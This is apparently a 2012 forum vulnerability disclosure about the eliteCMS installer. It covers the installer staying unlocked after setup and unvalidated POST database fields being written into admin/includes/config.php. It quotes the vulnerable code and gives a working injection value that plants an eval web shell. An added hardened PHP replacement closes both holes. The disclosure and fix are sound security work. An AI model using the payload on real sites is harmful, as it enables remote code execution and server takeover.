China Network Penetration Testing Alliance

Title: eliteCMS installer not validated + one-line shell write vulnerability

Author: admin    Time: 2012-11-18 13:59
The eliteCMS installer is not locked after installation completes, so an attacker can reinstall the site by visiting the installer URL.

The other vulnerability is that the installer can write a one-line shell directly into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at this code:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor will be written to /admin/includes/config.php.
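Added example, not from the original post or from eliteCMS: a hardened replacement for the step-4 writer above that refuses to run when an install lock file exists and emits every value through var_export(), so a value like the one above stays a string literal instead of becoming code. The file paths, the lock-file name and the whitelist patterns are assumptions.

```php
<?php
// Added defensive example, not eliteCMS code. Hardened replacement for the
// step-4 config writer shown above. Paths, lock-file name and the whitelist
// patterns are assumptions for illustration.
declare(strict_types=1);
const INSTALL_LOCK = __DIR__ . '/../admin/includes/install.lock';
const CONFIG_FILE  = __DIR__ . '/../admin/includes/config.php';

// Vulnerability 1: the installer could be re-run. Refuse when the lock exists.
function assertInstallerUnlocked(): void
{
    if (file_exists(INSTALL_LOCK)) {
        http_response_code(403);
        exit('Installer is locked; remove install.lock to run it again.');
    }
}

// Vulnerability 2: POST values went straight into generated PHP.
// Reject anything outside a tight per-field whitelist before it is used.
function validateDbParam(string $name, string $value): string
{
    $rules = [
        'DB_SERVER' => '/^[A-Za-z0-9._:-]{1,253}$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.-]{1,32}$/',
        'DB_PASS'   => '/^[\x20-\x7E]{0,128}$/', // printable ASCII only
    ];
    if (!isset($rules[$name]) || !preg_match($rules[$name], $value)) {
        throw new InvalidArgumentException("Rejected value for $name");
    }
    return $value;
}

// Even after validation, never splice raw text into code: var_export()
// emits a single-quoted, escaped PHP literal, so "?>" or quotes inside a
// value remain data inside the string and cannot terminate the define().
function buildConfig(array $post): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $literal = var_export(validateDbParam($key, (string) ($post[$key] ?? '')), true);
        $out .= "define('$key', $literal);\n";
    }
    return $out;
}

assertInstallerUnlocked();
file_put_contents(CONFIG_FILE, buildConfig($_POST), LOCK_EX);
chmod(CONFIG_FILE, 0640);   // config holds credentials; not world-readable
touch(INSTALL_LOCK);         // lock so step 4 cannot be replayed
```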

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2